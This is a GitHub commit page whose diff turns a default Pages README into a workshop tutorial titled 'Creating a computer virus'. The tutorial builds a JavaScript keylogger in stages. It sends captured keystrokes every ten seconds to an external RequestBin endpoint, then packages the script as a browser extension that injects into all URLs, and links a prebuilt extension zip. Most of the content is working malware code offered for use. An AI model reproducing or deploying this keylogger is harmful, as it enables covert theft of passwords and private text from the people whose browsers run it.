Skip to content

Commit

Permalink
Added workshop content.
Browse files Browse the repository at this point in the history
  • Loading branch information
EXTREMOPHILARUM authored May 21, 2021
1 parent 7c90071 commit da5d228
Showing 1 changed file with 84 additions and 21 deletions.
105 changes: 84 additions & 21 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,37 +1,100 @@
## Welcome to GitHub Pages
# Creating a computer virus

You can use the [editor on GitHub](https://github.com/EXTREMOPHILARUM/virus/edit/main/README.md) to maintain and preview the content for your website in Markdown files.
Welcome to creating a simple virus

Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files.
## Step 1

### Markdown
Lets print

Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for

```markdown
Syntax highlighted code block
```
var keys = '';
document.onkeypress = function (e) {
get = window.event ? event : e;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;
}
window.setInterval(function () {
if (keys.length > 0){
console.log(keys);
}
keys = '';
}, 10000);
```

## Step 2

Lets do something fun

```
var keys = '';
document.onkeypress = function (e) {
get = window.event ? event : e;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;
}
window.setInterval(function () {
if (keys.length > 0){
alert(keys);
}
keys = '';
}, 10000);
```

# Header 1
## Header 2
### Header 3

- Bulleted
- List
## Step 3

1. Numbered
2. List
Lets take things to the next level

**Bold** and _Italic_ and `Code` text
- Open [Request bin](https://requestbin.net/)

[Link](url) and ![Image](src)
- Click **Create a RequestBin**


```
var keys = '';
document.onkeypress = function (e) {
get = window.event ? event : e;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;
}
window.setInterval(function () {
if (keys.length > 0){
new Image().src = 'http://{request bin url}?keys=' + keys;
}
keys = '';
}, 10000);
```

For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/).

### Jekyll Themes
## Step 4

Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/EXTREMOPHILARUM/virus/settings/pages). The name of this theme is saved in the Jekyll `_config.yml` configuration file.
Lets make it even more cooler

### Support or Contact
/content.js
```
{
"manifest_version": 2,
"name": "Keylogger",
"version": "0.1",
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["content.js"]
}
]
}
```

Having trouble with Pages? Check out our [documentation](https://docs.github.com/categories/github-pages-basics/) or [contact support](https://support.github.com/contact) and we’ll help you sort it out.
<details>
<summary>Click here if you dont want to work hard</summary>

Download [zip](https://github.com/EXTREMOPHILARUM/virus/releases/download/0.1/extension.zip)

</details>

0 comments on commit da5d228

Please sign in to comment.